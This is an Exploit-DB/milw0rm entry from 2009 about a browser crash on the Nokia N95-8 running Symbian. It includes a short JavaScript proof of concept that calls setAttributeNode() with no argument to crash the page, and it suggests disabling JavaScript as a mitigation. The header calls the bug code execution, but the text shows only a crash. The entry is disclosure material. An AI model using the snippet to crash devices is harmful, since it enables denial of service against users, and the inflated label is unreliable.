Nokia N95-8 Vulnerability

vendor:

N95-8

by:

Juan Pablo Lopez Yacubian

7.5

CVSS

HIGH

JavaScript Code Execution

CWE

Product Name: N95-8

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: Nokia N95-8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Symbian

2009

The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash. The error is in the method 'setAttributeNode', because the bad implement is the cause of bug.

Mitigation:

Disable JavaScript in the browser

Source

Exploit-DB raw data:

Application: Nokia N95-8
OS: Symbian
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT

------------------------------------------------------
Description

The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless.

 :) 

------------------------------------------------------
Vulnerability

The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash.

The error is in the method "setAttributeNode", because the bad implement is the cause of bug.

------------------------------------------------------
POC/EXPLOIT

Enter in this url

http://es.geocities.com/jplopezy/nokiacrash2.html


or make html file and insert this code

<input type='checkbox' id='c'>
<script>
r=document.getElementById('c');
a=r.setAttributeNode();
</script>

------------------------------------------------------
Juan Pablo Lopez Yacubian 

# milw0rm.com [2009-02-13]